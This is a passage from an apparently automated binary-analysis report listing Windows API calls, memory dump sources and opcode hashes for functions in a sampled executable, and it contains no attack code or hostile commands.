                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp
                                      Similarity
                                      • API ID: ExceptionFilterUnhandled
                                      • String ID:
                                      • API String ID: 3192549508-0
                                      • Opcode ID: d3cc8c2acf79cdad4b157809c996d2d7bdd8f6f47901dc6ddb981acf445a2862
                                      • Instruction ID: bd58d953401e6158f77e69219718a5e42049e2034aafe8c5a644c12568a89ba1
                                      • Opcode Fuzzy Hash: d3cc8c2acf79cdad4b157809c996d2d7bdd8f6f47901dc6ddb981acf445a2862
                                      • Instruction Fuzzy Hash: 12A001B4942B008B87107BA8A8096093AA0AA48652B5112A6A69582679EB6440809A5A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • EnterCriticalSection.KERNEL32(0047129C,00471264,00000000,?,00471280,00471280,0044D0B9,?,00000000,0044C696,0044BFA0,0044C6B2,00448804,0044A2B4,?,00000000), ref: 0044CD2D
                                      • GlobalAlloc.KERNELBASE(00002002,00000000,?,?,00471280,00471280,0044D0B9,?,00000000,0044C696,0044BFA0,0044C6B2,00448804,0044A2B4,?,00000000), ref: 0044CD82
                                      • GlobalHandle.KERNEL32(00741E08), ref: 0044CD8B
                                      • GlobalUnlock.KERNEL32(00000000,?,?,00471280,00471280,0044D0B9,?,00000000,0044C696,0044BFA0,0044C6B2,00448804,0044A2B4,?,00000000), ref: 0044CD94
                                      • GlobalReAlloc.KERNEL32 ref: 0044CDA6
                                      • GlobalHandle.KERNEL32(00741E08), ref: 0044CDBD
                                      • GlobalLock.KERNEL32 ref: 0044CDC4
                                      • LeaveCriticalSection.KERNEL32(004368AB,?,?,00471280,00471280,0044D0B9,?,00000000,0044C696,0044BFA0,0044C6B2,00448804,0044A2B4,?,00000000), ref: 0044CDCA
                                      • GlobalLock.KERNEL32 ref: 0044CDD9
                                      • LeaveCriticalSection.KERNEL32(?), ref: 0044CE22
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp
                                      Similarity
                                      • API ID: Global$CriticalSection$AllocHandleLeaveLock$EnterUnlock
                                      • String ID:
                                      • API String ID: 2667261700-0
                                      • Opcode ID: ad6d95207c2c6c475d026028da1bef78df2ae27aba095f734871a2018bb70ace
                                      • Instruction ID: 41b8a22e85fa85e2cbe44c46998bc1cfe792355f624ada439946733bb8e5c358
                                      • Opcode Fuzzy Hash: ad6d95207c2c6c475d026028da1bef78df2ae27aba095f734871a2018bb70ace
                                      • Instruction Fuzzy Hash: 6431D2B16007059FE7209F28DC89A2ABBE8FB44305F044A7EF456C3662E775E8048B54
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • KiUserCallbackDispatcher.NTDLL ref: 00449091
                                      • GetSystemMetrics.USER32 ref: 00449098
                                      • GetDC.USER32(00000000), ref: 004490B1
                                      • GetDeviceCaps.GDI32(00000000,00000058), ref: 004490C2
                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004490CA
                                      • ReleaseDC.USER32 ref: 004490D2
                                        • Part of subcall function 0044D2D5: GetSystemMetrics.USER32 ref: 0044D2E7
                                        • Part of subcall function 0044D2D5: GetSystemMetrics.USER32 ref: 0044D2F1
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp
                                      Similarity
                                      • API ID: MetricsSystem$CapsDevice$CallbackDispatcherReleaseUser
                                      • String ID:
                                      • API String ID: 1031845853-0
                                      • Opcode ID: ce0827bbda45220ec8f21835fb4f738b432ddd7621062c90d7957bf90e013a17
                                      • Instruction ID: de015884d07a70655cd762315a7e791271baf7ebf5b9c814233db0a9f052ac6b
                                      • Opcode Fuzzy Hash: ce0827bbda45220ec8f21835fb4f738b432ddd7621062c90d7957bf90e013a17
                                      • Instruction Fuzzy Hash: 05F054305407009AF7206B729C4DF1B77A4EB91B56F11452EE601466E1DAB5DC01CFA5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • HeapReAlloc.KERNEL32(00000000,00000060,00000000,00000000,004394AD,00000000,?,?,?,0043683B), ref: 0043970D
                                      • RtlAllocateHeap.NTDLL(00000008,000041C4,00000000,00000000,004394AD,00000000,?,?,?,0043683B), ref: 00439741
                                      • VirtualAlloc.KERNELBASE(00000000,00100000,00002000,00000004,?,0043683B), ref: 0043975B
                                      • HeapFree.KERNEL32(00000000,?,?,0043683B), ref: 00439772
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp
                                      Similarity
                                      • API ID: Heap$Alloc$AllocateFreeVirtual
                                      • String ID:
                                      • API String ID: 1005975451-0
                                      • Opcode ID: a1e53f7c4627e64d4cab0a5f12f4ae7980d316a91c477806b3385b41e0cd262a
                                      • Instruction ID: 8f2e2a46fff020ceebcd77996ad294a1df47d54e69d793dca874ce5180fa1092
                                      • Opcode Fuzzy Hash: a1e53f7c4627e64d4cab0a5f12f4ae7980d316a91c477806b3385b41e0cd262a
                                      • Instruction Fuzzy Hash: 51113A31200340EFC7308F19ED85A627BB6FB89751B50492AF15AC6AF5C3F198C6CB18
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • RtlAllocateHeap.NTDLL(?,00000008,00001048), ref: 00459A9D
                                      • RtlAllocateHeap.NTDLL(?,00000008,?), ref: 00459B38
                                      • RtlAllocateHeap.NTDLL(?,00000008,?), ref: 00459B4C
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp
                                      Similarity
                                      • API ID: AllocateHeap
                                      • String ID:
                                      • API String ID: 1279760036-0
                                      • Opcode ID: 9f3e9e6c98b4ca4221b31826def544a6d5a4dc9f843c6857c8ea1e7f7bf5d80a
                                      • Instruction ID: 1485277bc71d42c7a2e462d699ac850e19a31b53f22b8dbfa60e2f7fcb85d0e5
                                      • Opcode Fuzzy Hash: 9f3e9e6c98b4ca4221b31826def544a6d5a4dc9f843c6857c8ea1e7f7bf5d80a
                                      • Instruction Fuzzy Hash: B551E9B5A00109EFDB04DF98C981EAEB7B5FF88300F108159F915AB341D635AE55CBA5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • SetErrorMode.KERNELBASE(00000000,00000000,0044A2D3,00000000,00000000,00000000,00000000,?,00000000,?,004436DC,00000000,00000000,00000000,00000000,004368AB), ref: 0044D6D3
                                      • SetErrorMode.KERNELBASE(00000000,?,00000000,?,004436DC,00000000,00000000,00000000,00000000,004368AB,00000000), ref: 0044D6DA
                                        • Part of subcall function 0044D72D: GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?), ref: 0044D75E
                                        • Part of subcall function 0044D72D: lstrcpyA.KERNEL32(?,.HLP,?,?,00000104), ref: 0044D7FF
                                        • Part of subcall function 0044D72D: lstrcatA.KERNEL32(?,.INI,?,?,00000104), ref: 0044D82C
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp
                                      Similarity
                                      • API ID: ErrorMode$FileModuleNamelstrcatlstrcpy
                                      • String ID:
                                      • API String ID: 3389432936-0
                                      • Opcode ID: 43d3a8b0a8eb7613163596dbe267daaa4045f83054bdb6cc33622f808e71fb80
                                      • Instruction ID: 08018a144fd71b122f53f93859323684dea7b69782bdb41910a173adbe26382b
                                      • Opcode Fuzzy Hash: 43d3a8b0a8eb7613163596dbe267daaa4045f83054bdb6cc33622f808e71fb80
                                      • Instruction Fuzzy Hash: E0F03CB49052104FE754AF65D484B097BE4AF44714F06849FF4449B3A2CB78D840CBA9
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp
                                      Similarity
                                      • API ID: CurrentHookThreadWindows
                                      • String ID:
                                      • API String ID: 1904029216-0
                                      • Opcode ID: d1946b4b5f0bb4dac5015d24637ae73f29ef06285a2f11d8d1c4ed78f88735c7
                                      • Instruction ID: 6434d997b0ca645eb757e57b22b608c173830560ff11fe72d352ce575c6ac3eb
                                      • Opcode Fuzzy Hash: d1946b4b5f0bb4dac5015d24637ae73f29ef06285a2f11d8d1c4ed78f88735c7
                                      • Instruction Fuzzy Hash: 8BF0A7319016506FF7603BB26C4EB5A39609B05319F4A476FB1026B1E2CF2C9C41875D
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • HeapCreate.KERNELBASE(00000000,00001000,00000000,00436829,00000001), ref: 0043901D
                                        • Part of subcall function 00439048: HeapAlloc.KERNEL32(00000000,00000140,00439031), ref: 00439055
                                      • HeapDestroy.KERNEL32 ref: 0043903B
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp
                                      Similarity
                                      • API ID: Heap$AllocCreateDestroy
                                      • String ID:
                                      • API String ID: 2236781399-0
                                      • Opcode ID: ed9c888bb612b73e073b43d255091410b4b2958213777411d3e3523189053186
                                      • Instruction ID: 75467280b13c405997843fcdb9d00a0c8a966375f0174e6eea3db59680342214
                                      • Opcode Fuzzy Hash: ed9c888bb612b73e073b43d255091410b4b2958213777411d3e3523189053186
                                      • Instruction Fuzzy Hash: 48E05B716143005FEB241B31AD4576636E5DB5C783F104476B904C41F6EBF8CCC09E08
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • VirtualAlloc.KERNELBASE(?,00008000,00001000,00000004,00000000,00000000,000000E0,?,?,004394BC,000000E0,00000000,?,?,?,0043683B), ref: 004397E7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp
                                       • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp
                                       • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp
                                       • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp
                                       • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp
                                       • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp
                                       • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp
                                       • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp
                                      Similarity
                                      • API ID: AllocVirtual
                                      • String ID:
                                      • API String ID: 4275171209-0
                                      • Opcode ID: cfb3c694cca046faafdba626416f576a4e966fba747c95529c6df6e76ea207dd
                                      • Instruction ID: ddab8c0de8b454498bcbd443a27c592ae9c6af54464b130e9ee3fff07dff6107
                                      • Opcode Fuzzy Hash: cfb3c694cca046faafdba626416f576a4e966fba747c95529c6df6e76ea207dd
                                      • Instruction Fuzzy Hash: A6319C716006069FD314CF18C484BA5BBE4FB94364F24C2BED15A8B3E2D7B4D906CB44
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • HeapAlloc.KERNEL32(00000008,?,?,?,?,0043858B,00000001,00000074,?,0043683B), ref: 0043CC75
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp
                                       • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp
                                       • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp
                                       • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp
                                       • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp
                                       • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp
                                       • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp
                                       • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp
                                      Similarity
                                      • API ID: AllocHeap
                                      • String ID:
                                      • API String ID: 4292702814-0
                                      • Opcode ID: d84fbaf4d9db0fde22ea67c64c54a2b9b7244b0bc250dac9cc500a4cfd7363fd
                                      • Instruction ID: a2d638b41c73fe25d314f60e6d3419ee44180230b70d95c8f78c3885eb5d0c7a
                                      • Opcode Fuzzy Hash: d84fbaf4d9db0fde22ea67c64c54a2b9b7244b0bc250dac9cc500a4cfd7363fd
                                      • Instruction Fuzzy Hash: 4C0168365017102AE621222A6DC1B5B62059B8C7B5F193127FD5D773D2DA6C8C41439D
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Non-executed Functions

                                      APIs
                                      • GetPropA.USER32 ref: 004414D5
                                      • CallWindowProcA.USER32 ref: 004414F7
                                        • Part of subcall function 004401E0: CallWindowProcA.USER32 ref: 00440206
                                        • Part of subcall function 004401E0: RemovePropA.USER32 ref: 0044021E
                                        • Part of subcall function 004401E0: RemovePropA.USER32 ref: 0044022A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp
                                       • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp
                                       • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp
                                       • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp
                                       • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp
                                       • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp
                                       • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp
                                       • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp
                                      Similarity
                                      • API ID: Prop$CallProcRemoveWindow
                                      • String ID: #32770
                                      • API String ID: 2276450057-463685578
                                      • Opcode ID: 596bb558e865478f89c805c3f39751e40d7ca6def2da487f474ae61eff310b4b
                                      • Instruction ID: 5e5ac69cd16c431473ba198cff910c95c7e092372b87668bf0dfd73680f8d94b
                                      • Opcode Fuzzy Hash: 596bb558e865478f89c805c3f39751e40d7ca6def2da487f474ae61eff310b4b
                                      • Instruction Fuzzy Hash: B381083660130477F620AB11DC45FEF776CEB863A6F000427FA0683262D72DE99586BE
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp
                                       • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp
                                       • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp
                                       • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp
                                       • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp
                                       • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp
                                       • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp
                                       • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp
                                      Similarity
                                      • API ID:
                                      • String ID: +$+$-$-$0$0$0$0$0$1$1$9$9$9$9$9$9$C$E$c$e
                                      • API String ID: 0-1157002505
                                      • Opcode ID: bd92f769701acbabcda757e67f8c84c0c29cef7b7df9b59f2df65afb2bd5e7df
                                      • Instruction ID: 6e2cd87681fd11b95aa59c96bf0e514dab5f7b1500e008d072f0b4967df15fe4
                                      • Opcode Fuzzy Hash: bd92f769701acbabcda757e67f8c84c0c29cef7b7df9b59f2df65afb2bd5e7df
                                      • Instruction Fuzzy Hash: B5E1F631D5620ADEEF298F5AC4457FE7BB1AB0C304F246027E411A62C2D7BD8D86CB19
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • FindFirstFileA.KERNEL32(00000000,?), ref: 0043637B
                                      • GetDriveTypeA.KERNEL32(00000000), ref: 004363D7
                                      • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00436445
                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 0043645B
                                      • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 004364B1
                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 004364C7
                                      • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0043651F
                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 00436535
                                      • FindClose.KERNEL32(?), ref: 0043656C
                                      • GetLastError.KERNEL32 ref: 004365AE
                                      • FindClose.KERNEL32(?), ref: 004365BE
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp
                                       • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp
                                       • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp
                                       • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp
                                       • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp
                                       • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp
                                       • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp
                                       • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp
                                      Similarity
                                      • API ID: Time$File$FindLocalSystem$Close$DriveErrorFirstLastType
                                      • String ID: ./\
                                      • API String ID: 816071114-3176372042
                                      • Opcode ID: 85dda5fa7655cb79b2db567d9f90a52d131cb0fa20e551a420700b2d3b4c7aac
                                      • Instruction ID: 16edfbd5c2c47281b64e8a19442489466bf5a4e536016fba3494bf0c05afe862
                                      • Opcode Fuzzy Hash: 85dda5fa7655cb79b2db567d9f90a52d131cb0fa20e551a420700b2d3b4c7aac
                                      • Instruction Fuzzy Hash: 5F818FB1840219BECB20DFA5DC04AAFB7F8AF0C315F0094ABF555E6251E738DA44CB69
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • CallWindowProcA.USER32 ref: 00440D1A
                                      • DefWindowProcA.USER32(00000000,?,?,?), ref: 00440D2D
                                      • IsIconic.USER32(00000000), ref: 00440D4F
                                      • SendMessageA.USER32(00000000,000011EF,00000000,00000001), ref: 00440D7C
                                      • GetWindowLongA.USER32 ref: 00440D8B
                                      • GetWindowDC.USER32(00000000), ref: 00440DCC
                                      • GetWindowRect.USER32 ref: 00440DDA
                                      • InflateRect.USER32(?,000000FF,000000FF), ref: 00440E1D
                                      • InflateRect.USER32(?,000000FF,000000FF), ref: 00440E40
                                      • SelectObject.GDI32(00000000,00000000), ref: 00440E4E
                                      • OffsetRect.USER32(?,?,00000000), ref: 00440EA4
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp
                                       • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp
                                       • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp
                                       • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp
                                       • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp
                                       • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp
                                       • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp
                                       • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp
                                      Similarity
                                      • API ID: Window$Rect$InflateProc$CallIconicLongMessageObjectOffsetSelectSend
                                      • String ID:
                                      • API String ID: 2215177122-0
                                      • Opcode ID: 32e174de3d94b8017e313b7cafda405eb6513b402cdbba80a2c3ec7db4591613
                                      • Instruction ID: 9f7d3192de9f4fd847b4db668f76f1e974e6555d221dedb860730df8ee33fd10
                                      • Opcode Fuzzy Hash: 32e174de3d94b8017e313b7cafda405eb6513b402cdbba80a2c3ec7db4591613
                                      • Instruction Fuzzy Hash: BE815871508301AFD300DF68DC85E6BB7E4FB89319F044A2EF989872A1D775EA05CB66
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • LoadLibraryA.KERNEL32(user32.dll,?,00000000,?,0043BA5D,?,Microsoft Visual C++ Runtime Library,00012010,?,00461440,?,00461490,?,?,?,Runtime Error!Program: ), ref: 0043E8CB
                                      • GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 0043E8E3
                                      • GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 0043E8F4
                                      • GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 0043E901
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp
                                       • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp
                                       • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp
                                       • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp
                                       • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp
                                       • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp
                                       • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp
                                       • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp
                                      Similarity
                                      • API ID: AddressProc$LibraryLoad
                                      • String ID: GetActiveWindow$GetLastActivePopup$MessageBoxA$user32.dll
                                      • API String ID: 2238633743-4044615076
                                      • Opcode ID: 5fefb38458db5f044049b701284ee05f5d68dca90c23af830288f4c03ca47f9e
                                      • Instruction ID: 30c8665ccc2e40d9467df029bce41031994b6616794be17e79eec1558e76a480
                                      • Opcode Fuzzy Hash: 5fefb38458db5f044049b701284ee05f5d68dca90c23af830288f4c03ca47f9e
                                      • Instruction Fuzzy Hash: 0D01D875301341AF8B50AFBADC80B5B3AE89E5C781B09143BF109D2272D778C8459B5E
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • FindResourceA.KERNEL32(?,?,00000002), ref: 00443543
                                      • SizeofResource.KERNEL32(?,00000000,?,76922D10,00000000,769217C0,?,?,?,?,?,?,?,?,00441181,00000001), ref: 0044355D
                                      • LoadResource.KERNEL32(?,00000000,?,76922D10,00000000,769217C0,?,?,?,?,?,?,?,?,00441181,00000001), ref: 00443567
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp
                                       • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp
                                       • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp
                                       • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp
                                       • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp
                                       • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp
                                       • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp
                                       • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp
                                      Similarity
                                      • API ID: Resource$FindLoadSizeof
                                      • String ID:
                                      • API String ID: 507330600-0
                                      • Opcode ID: 7e5b313211204ffa4e332eb726cc08490a13e872b21fef04d21c9d65485d2146
                                      • Instruction ID: 1917320e325defd3a61241e9dbda23396abca62690361eb653e02e1e1d4cba8c
                                      • Opcode Fuzzy Hash: 7e5b313211204ffa4e332eb726cc08490a13e872b21fef04d21c9d65485d2146
                                      • Instruction Fuzzy Hash: 0241CD326047155BE70CCE29985AAAF77D2EBC9251F048A3EFA46C3391CB71D909C2A5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • FindResourceA.KERNEL32(?,00000000,00000005), ref: 00448260
                                      • LoadResource.KERNEL32(?,00000000), ref: 00448268
                                        • Part of subcall function 00444E40: UnhookWindowsHookEx.USER32(?), ref: 00444E65
                                      • LockResource.KERNEL32(?), ref: 00448275
                                      • IsWindowEnabled.USER32(?), ref: 004482A8
                                      • EnableWindow.USER32(?,00000000), ref: 004482B6
                                      • EnableWindow.USER32(?,00000001), ref: 00448344
                                      • GetActiveWindow.USER32 ref: 0044834F
                                      • SetActiveWindow.USER32(?), ref: 0044835D
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp
                                       • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp
